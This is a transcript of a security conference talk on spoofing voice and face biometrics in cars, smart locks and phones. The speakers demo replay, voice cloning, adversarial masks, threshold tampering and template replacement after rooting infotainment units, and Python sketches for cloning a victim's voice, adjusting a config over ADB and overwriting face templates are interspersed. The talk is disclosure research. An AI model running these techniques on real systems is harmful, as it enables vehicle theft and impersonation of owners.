Hi, guys. Thanks for attending our talk. We're going to talk about biometric system hacking in the age of the smart vehicle. So who are we? I'm Kevin2600, and this is my teammate, Wesley. We are security researchers from a security lab, and we have found many interesting vehicle-related bugs and presented some of them at DEF CON in the past few years. If anyone wonders what a car hackers' lab looks like, here are some pictures for you. Just like any other lab, we have lots of interesting equipment, and most importantly, we have actual cars to play with.

So here are the contents of today's talk. We are going to cover biometric authentication, then facial recognition spoofing, and then speaker recognition spoofing for vehicles.

Okay, so biometric authentication. This is the definition of multi-factor authentication: basically, you need two or more factors, like something you are, something you have, and something you know, to achieve authentication.

Something you have: usually this means the key fob for our cars. The key fob is a very common device for the vehicle, and recently some car companies have started to replace the physical key fob with an NFC card or just a mobile phone to access the car. For example, this is the key system for Tesla. In the beginning, Tesla only provided the NFC card and the mobile app to access the vehicle. Later, Tesla added a physical key fob, but it is still based on BLE and NFC.

Something you know: interestingly, some car companies like Ford provide a feature that lets us unlock the door with a PIN code. So that's something we need to always remember, right?

And something you are: some models not only use PIN codes to unlock the door, they also provide a fingerprint reader, which means we can put our finger on it to unlock the car. Some companies use face ID for access to the vehicle, which has become a new trend too. And car companies like BMW and Honda prefer to use our human voiceprint, integrating with a smart speaker to control the car, like Honda here with Alexa.

Okay, let's move on to how we do speaker recognition spoofing. The definition of speaker recognition is the identification of a person from the characteristics of their voice. It can be used to authenticate or verify the identity of a speaker as part of a security process. This definition I took from Wikipedia. The history of speaker recognition can be traced all the way back to the '60s. Speaker recognition algorithms started with template matching, then moved on to probability models like GMM and GMM-UBM, and then to feature-embedding classifiers like i-vectors, d-vectors, and x-vectors and so on.

A speaker recognition system generally consists of two stages: feature extraction and feature matching. In practice, the extracted features are matched against the features of the people registered in the database, and the identity is determined based on the similarity of the two feature sets.
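Before we get to the spoofing part, here is a minimal sketch of that enroll-and-match flow, assuming the open-source Resemblyzer speaker encoder (a d-vector implementation). The 0.80 acceptance threshold and the file names are our own assumptions, not values from any vendor system.

```python
# Minimal sketch of the enroll/verify flow described above, using the
# open-source Resemblyzer speaker encoder (a d-vector model).
# The 0.80 acceptance threshold is an assumption, not a vendor value.
import numpy as np
from resemblyzer import VoiceEncoder, preprocess_wav

encoder = VoiceEncoder()

def enroll(wav_path: str) -> np.ndarray:
    """Feature extraction: a fixed-length embedding from an enrollment recording."""
    return encoder.embed_utterance(preprocess_wav(wav_path))

def verify(claim_wav_path: str, enrolled: np.ndarray,
           threshold: float = 0.80) -> bool:
    """Feature matching: cosine similarity between claim and enrolled embedding."""
    claim = encoder.embed_utterance(preprocess_wav(claim_wav_path))
    # Embeddings are L2-normalized, so the dot product is the cosine similarity.
    similarity = float(np.dot(claim, enrolled))
    return similarity >= threshold

# enrolled = enroll("victim_enrollment.wav")
# print(verify("candidate_utterance.wav", enrolled))
```

For the content to be recognized, speaker recognition systems are generally divided into three categories. The first is fixed vocabulary recognition, meaning voiceprint recognition through a fixed vocabulary, such as "Hey Siri". The second is fixed vocabulary plus random content recognition, meaning fixed and random contents combined together, such as a fixed phrase plus "2600", where the "2600" part is generated randomly by the system.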
And finally, the third is random content recognition, where the entire phrase is generated randomly by the system.

Now, as you can see, speaker recognition systems are already everywhere, from access control systems to the voice assistants in our cars. But what could possibly go wrong? Here we list some of the most common spoofing methods for speaker recognition. The first is called the impersonation attack: the attacker tries to imitate the victim's speaking tone to defeat the target system, but this attack can be easily detected by the speaker recognition system. There are more effective attacks, though: the replay attack, speech synthesis, voice conversion, and the adversarial example attack. We are going to talk about those attacks in more detail later.

Now, let's talk about the replay attack. It is mainly aimed at systems with fixed-sentence verification. We can use a recording device to record the fixed sentence from the victim, then replay the recorded sentence during verification to defeat the speaker recognition system. As we can see from the mel spectrogram, the similarity of the replayed voice to the genuine voice is high. This is why the replay attack is a very simple yet very effective attack. However, this simple method may not pass a speaker authentication system that has voice anti-spoofing.

Now, let's see some demos. There are already plenty of third-party apps that can control smart cars like Tesla using Siri. This is a video demo of the replay attack on Siri. Because some of the commands in this app, like unlocking the vehicle, need authentication such as a PIN code, we can only open the charge port with it. Yeah, the door currently is locked. And then, yeah, the port is open. However, we have found at least one app that doesn't need any authentication, and with it we can unlock the Tesla very easily. Oh, sorry. "Ask Tesla to unlock it." Yep, it works.

Now let's take a look at the speech synthesis (text-to-speech) attack. Let's take Google's SV2TTS as an example. The entire speech synthesis pipeline can be divided into three parts. The speaker encoder module is responsible for extracting speaker features from short sentences. The synthesizer module is responsible for combining the speaker features with text, generating a mel spectrogram that blends the specified speaker's characteristics into speech corresponding to the specified text. And the vocoder module is responsible for generating voice data from the mel spectrogram, which is the audio data we use for the TTS attack.

For the speech synthesis environment, we use software called MockingBird, a real-time voice cloning tool based on the SV2TTS algorithm open-sourced by Google. It can clone a voice from just five seconds of audio and generate arbitrary speech in real time.
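To make those three modules concrete, here is a hedged sketch following the demo flow of the open-source Real-Time-Voice-Cloning code base that MockingBird builds on. The checkpoint paths, file names, and the spoken text are placeholders, not our exact setup.

```python
# Hedged sketch of the three-stage SV2TTS cloning pipeline (speaker encoder ->
# synthesizer -> vocoder), following the demo flow of the open-source
# Real-Time-Voice-Cloning project that MockingBird builds on. Model paths
# are placeholders; check the project README for the actual checkpoints.
from pathlib import Path
import soundfile as sf

from encoder import inference as encoder
from synthesizer.inference import Synthesizer
from vocoder import inference as vocoder

encoder.load_model(Path("saved_models/encoder.pt"))
synthesizer = Synthesizer(Path("saved_models/synthesizer.pt"))
vocoder.load_model(Path("saved_models/vocoder.pt"))

# Stage 1: extract the victim's voiceprint from ~5 seconds of recorded speech.
wav = encoder.preprocess_wav(Path("victim_5s_sample.wav"))
embed = encoder.embed_utterance(wav)

# Stage 2: condition the synthesizer on that embedding plus the text we need,
# e.g. the random digits the speaker system asks us to repeat.
specs = synthesizer.synthesize_spectrograms(["four two six zero zero"], [embed])

# Stage 3: the vocoder turns the mel spectrogram back into a waveform to replay.
generated = vocoder.infer_waveform(specs[0])
sf.write("cloned_challenge_response.wav", generated, synthesizer.sample_rate)
```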
And this is a demo of the speech synthesis attack. The first demo attacks a smart speaker that has voiceprint anti-spoofing enabled, but we can use TTS to spoof it and impersonate other people. The second demo attacks the Tmall smart speaker. It can also be spoofed by the TTS attack, and we can go even further by impersonating someone else to purchase something online. This one uses fixed vocabulary plus random content, so a plain replay without modification cannot bypass the system. So now we use MockingBird to generate the random number and replay it to the Tmall speaker, while trying to find the right angle for the speaker. As you can see, we may need to try a couple of times in order to get it to work. And there, the attack actually succeeded.

Next, the adversarial example attack, which means an attacker intentionally crafts an input to cause a machine learning model to make a mistake. First, the speaker verification spoofing attack. The main goal is to attack the speaker verification algorithm: by adding a carefully calculated perturbation to the speech data, the speech gets recognized as the genuine victim, defeating the authentication system. This is one of our demos, an adversarial example speech recognition spoofing attack on an open-source project called DeepSpeech. We first play a genuine recording, and it is recognized successfully. Then we play the adversarial recording, and DeepSpeech transcribes it as something different. That means our attack is successful.

So let's summarize our spoofing methods for speaker recognition. As we can see, fixed vocabulary is the easiest to attack: a simple replay will work just fine. And for random contents, we can still use speech synthesis or adversarial examples.

Okay, time to move on to facial recognition spoofing. Facial recognition is a technology capable of matching a human face from a digital image or video frame against a database of faces. Usually it is used to authenticate users through ID verification services. Facial recognition technology is constantly evolving: it started out based on low-dimensional feature characterization, and nowadays it has evolved into three-dimensional face recognition. There are already many applications implementing face recognition, for example Face ID to unlock a mobile phone like the iPhone, or boarding a plane at the airport. Car companies have started to use face recognition technology for driver monitoring systems, and also use face ID for driver profiles to improve the driving experience. And of course, using the human face to authenticate the owner of a vehicle is indeed a very convenient way.

Here are the four stages of the face recognition procedure. The first is face detection: basically the system needs to know whether it is looking at a human face or a cat face. The second is liveness detection, a.k.a. face anti-spoofing; this stage plays a very important role in the face recognition procedure. The third and fourth are feature extraction and feature matching, where the system tries to match the face features against the database.

Let's take a closer look at the face recognition procedure, this time without face anti-spoofing. First, the input data is an image, and the system needs to determine whether there is a human face in it. Once the system spots a human face, it tries to extract the features from that particular face. In the final step, the system matches the face features to see if they are in the database.

Next, let's talk a bit more about face anti-spoofing. As we mentioned, this stage plays a very important role in the face recognition procedure. Usually we need to perform some action, like opening our mouth or shaking our head, for the system to determine whether the face presented is a real human being or just a piece of paper. In addition, a system can do silent face anti-spoofing, which means no human action is required; it determines liveness based on things like human skin texture or the different frequencies of motion and so on.

And this is a face recognition structure diagram, from which we can see there are many different entry points to attack. For example, later in the talk, we're going to share more real-life cases, such as the threshold value and feature value attacks.
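To tie those stages together, here is a minimal sketch of the detect, extract, and match pipeline, assuming the open-source face_recognition library (dlib-based, purely 2D). Note there is no liveness stage here, which is exactly the gap the attacks below exploit; the 0.6 distance threshold is that library's conventional default, not a value from any vehicle system.

```python
# Minimal sketch of the detect -> extract -> match pipeline described above,
# using the open-source face_recognition library (dlib-based, purely 2D).
# There is no liveness stage here, which is why a printed photo can pass
# this kind of pipeline. The 0.6 distance threshold is the library's
# conventional default, not a value from any vehicle system.
import face_recognition

def enroll(image_path: str):
    image = face_recognition.load_image_file(image_path)
    encodings = face_recognition.face_encodings(image)  # detection + extraction
    if not encodings:
        raise ValueError("no face detected")
    return encodings[0]  # 128-d feature vector stored in the "database"

def matches(candidate_path: str, enrolled, threshold: float = 0.6) -> bool:
    image = face_recognition.load_image_file(candidate_path)
    encodings = face_recognition.face_encodings(image)
    if not encodings:
        return False  # stage 1 failed: no face found
    distance = face_recognition.face_distance([enrolled], encodings[0])[0]
    return distance <= threshold  # stage 4: feature matching

# enrolled = enroll("owner.jpg")
# print(matches("printed_photo_of_owner.jpg", enrolled))  # often True!
```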
So what could possibly go wrong? Here we have listed the six most common methods to spoof a facial recognition system, from the photo attack up to more advanced ones like the adversarial example attack. We're going to talk about these attacks in more detail next.

This is the face photo attack. We can print the victim's photo on a piece of paper, and as you can see, it's very easy to do. Even kids can do it, right? See, they are very happy.

And this is what we call the Mr. Orange attack. Basically, we draw a human face on an orange in order to test the target system's face detection function. As we mentioned, human face detection is the first stage of every face recognition system. By simply drawing a human face on an orange, we can easily spoof a facial recognition system when it does not have a good face anti-spoofing mechanism.

So our first target is a smart lock from Xiaomi. Let's play the video first. Okay, as we can see from the video recording, when we presented the orange to the lock, it not only detected it as a real human, it even thought this guy is 24 years old. We also tested the Xiaomi lock with the face photo attack and the adversarial example attack, and as we can see, every trick works. The picture on the left is the real human victim, which the Xiaomi lock detected correctly. But when we presented a face photo, which is the one in the middle, or the adversarial example mask, which is the one here, it detected them as the same victim too. So they all work.

But this type of attack can be easily prevented, because some more advanced systems come with an infrared camera. This is what it looks like from the facial recognition system's point of view: if we present a human face photo, or a video on a mobile phone like the one here on the right, the infrared camera actually sees nothing at all.

Usually we need to do some action, like opening our mouth or shaking our head, for the face anti-spoofing to determine whether the face presented is a real human being or not. But what we can do is cut holes in the eye or mouth areas of the photo to bypass that detection. We can even buy a customized face sculpture to bypass systems that lack detection of human skin texture. So here's the video demo of the face sculpture attack on the Huawei P30 Pro. And it's working.

As we mentioned earlier, the principle of the adversarial example attack is an input intentionally designed by an attacker to cause a machine learning model to make a mistake. As we can see, when we add a small perturbation to the panda picture, the machine learning model has 99.3% confidence that it is a gibbon. This is the classic adversarial example. Based on various characteristics, adversarial example attacks can be divided into different methods: targeted or untargeted, white-box or black-box, and one-step or multi-step attacks. We mainly used the black-box adversarial example method for testing, where the transferability of the adversarial example is obtained by jointly training it against multiple models. The normal model training process adjusts the parameters of the model on a fixed data set; adversarial example generation does the opposite, adjusting the input sample under the condition of fixed parameters, continuously pushing the output of the model toward our expectations.
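Here is a minimal sketch of that idea, a single untargeted FGSM step (in PyTorch) against a generic image classifier: the model's weights stay fixed while the gradient is taken with respect to the input. The model and the epsilon budget are stand-ins, not the systems we tested.

```python
# Hedged sketch of "optimize the input, not the weights": one untargeted
# FGSM step (Goodfellow et al.) against a generic classifier.
import torch
import torch.nn.functional as F

def fgsm_perturb(model: torch.nn.Module, image: torch.Tensor,
                 label: torch.Tensor, epsilon: float = 8 / 255) -> torch.Tensor:
    """Return image + epsilon * sign(dLoss/dImage)."""
    model.eval()  # the model's parameters stay fixed throughout
    image = image.clone().detach().requires_grad_(True)  # (1, C, H, W) in [0, 1]
    loss = F.cross_entropy(model(image), label)          # label: true class id, shape (1,)
    loss.backward()  # gradient flows to the *input*, not to the weights
    adversarial = image + epsilon * image.grad.sign()
    return adversarial.clamp(0.0, 1.0).detach()

# adv = fgsm_perturb(model, x, y)  # model now likely misclassifies adv
```

For the black-box setting we describe, this kind of step is typically run against an ensemble of local substitute models, so that the resulting perturbation transfers to the unseen target system.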
The choice of perturbation area also has a big impact on the attack. We can add the perturbation to different areas of the face, but based on a research article from Tsinghua University, perturbation within the eyes and nose area has the highest success rate. Once we have made an adversarial example face mask, we can present it to some online face ID algorithms for testing. One interesting fact: even when we use the same mask, because human face skin and shape differ, one person may have a higher success rate than another. As the pictures show, the one on the left reaches only 73% similarity while the one on the right reaches 89%.

Okay, so this is a video demo of the adversarial example attack on the Huawei P30 Pro face ID login system. First, the real person: he can log in successfully. Now the attacker is coming. See, it doesn't work the first time. Then he puts on the adversarial example mask and gets straight in. And this is a video demo of the adversarial example attack on the face ID system of a Weltmeister (WM Motor) vehicle. Again, without the mask it doesn't work, so now we put on the crafted mask and try again. And this is another video demo, but the target is a car whose name we cannot disclose. This car actually allows us to turn on the engine and drive off if we bypass the face ID system, so it's kind of scary that we can bypass it with the adversarial example mask. We need to keep trying. You see? We keep trying, and yeah, eventually it works.

So now we have a clear idea of the principle of the adversarial attack: we add a small perturbation to cause the machine learning model to make a mistake. During the research, we also found that by putting a target face image over the attacker's face, covering the attacker's face partially, we can deceive some face recognition systems with an even higher success rate. This is a common limitation of 2D face recognition systems. This is a video demo of that partial face-cover attack, tested on a Xiaomi Note 9. Without the mask it won't work; then I put on this special mask, and it works every single time.

Of course, when the system's rules are set really tight, with a very high threshold value, we won't be able to bypass it easily. This one is the face ID login system of a banking app, which we failed to get into. Good for them, bad for us, right?

And so, the threshold value attack. This is a car we pen-tested before, whose name we cannot disclose. Just like the last smart car, it has an Android-based IVI, and we were able to get into its engineering mode. Once in engineering mode, we were able to enable the ADB connection, and once we got an ADB shell, we were root straight away. So what would you do when you get root on an IVI? Maybe replace the screen picture, right? See? Pretty cool.

Now, this car also has a face ID function. However, its anti-spoofing is so tight, so good, that we could not spoof it with the tricks we just mentioned above. But remember, we have root on the system, and it turns out the threshold value configuration file is stored locally on the IVI. So we can actually modify it to a very low value in order to bypass it, right? Here's the video demo of the attack. First, before we modify the threshold value, when we try to log in, it fails. Try again; yeah, it won't work. So then we do some magic by changing the threshold value, and once we change it, we need to reboot the IVI system for it to take effect.
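A hedged sketch of that threshold-tampering flow over ADB is below; the config path, file format, and key name are hypothetical placeholders, since every IVI stores this differently.

```python
# Hedged sketch of the threshold-value attack flow: pull the locally stored
# face-ID config over the root ADB shell, lower the match threshold, push it
# back, and reboot the IVI. The config path, file format, and key name are
# hypothetical placeholders -- every IVI stores this differently.
import json
import subprocess

CONFIG = "/data/vendor/faceid/config.json"  # hypothetical path

def adb(*args: str) -> str:
    return subprocess.run(["adb", *args], check=True,
                          capture_output=True, text=True).stdout

adb("root")                          # we already have root from engineering mode
adb("pull", CONFIG, "config.json")

with open("config.json") as f:
    cfg = json.load(f)
cfg["match_threshold"] = 0.01        # hypothetical key: almost any face now passes
with open("config.json", "w") as f:
    json.dump(cfg, f)

adb("push", "config.json", CONFIG)
adb("reboot")                        # as in the demo, a reboot is needed to apply it
```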
So once the system has rebooted, we can go in and try it again. Let's see if it works. Now the system has rebooted. Okay, let's try again. You can see the system... yeah, it's working. See, it's thinking, thinking... and we're in.

Similarly, this is a face ID system we came across during another pentest operation, but this one can store two human features in its database. Once we got root on the system, we could replace one of the features with our own, and then the system would accept either of them for a successful login. That means we can log in as the victim, while the victim is still able to log in as themselves, so nobody will even know we were there. (A small sketch of this trick follows at the end.)

Okay, now what if we cannot get a shell on the target, and the face ID rules are so tight? Are we out of options yet? Let's take a look. See, the door is open. So yeah, a simple RF replay attack will work, because these access control systems usually have multiple features enabled. It turns out our target can also be opened by a fixed-code radio remote controller. Just like people say: it's not a bug, it's a feature.

Okay, let's summarize some of the techniques we have seen so far. Face detection can be spoofed by the Mr. Orange attack, the face photo attack, and the face sculpture attack. For face anti-spoofing, the feature replace attack and the adversarial example attack will work. And for feature matching, the feature value attack and the threshold value attack are tricks we can always try. In the end, let's not forget the extra-function attacks, like using a HackRF or something to replay the radio signal, right?

Okay, here are some references if anyone would like to know more. As you can see, we did a lot of reading for this research, right? Yeah, I think that's it. Thank you.
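One last sketch, for the feature replace attack mentioned above, assuming the enrolled templates sit in a local SQLite database reachable over the same root ADB shell; the database path, table, and column names are hypothetical placeholders.

```python
# Hedged sketch of the feature replace attack: with root on the IVI,
# overwrite the second enrolled face template with the attacker's own
# embedding, so both attacker and victim can log in. The database path,
# table, and column names are hypothetical placeholders.
import sqlite3
import numpy as np

# Local copy of the template database, pulled from the IVI via the root
# shell (e.g. `adb pull /data/vendor/faceid/templates.db`).
DB_COPY = "templates.db"

attacker = np.load("attacker_embedding.npy").astype(np.float32)

conn = sqlite3.connect(DB_COPY)
# Hypothetical schema: one row per enrolled face, feature stored as a blob.
conn.execute("UPDATE face_templates SET feature = ? WHERE slot = 2",
             (attacker.tobytes(),))
conn.commit()
conn.close()
# Push the modified database back and reboot: the system now accepts the
# victim's original template (slot 1) *and* the attacker's (slot 2).
```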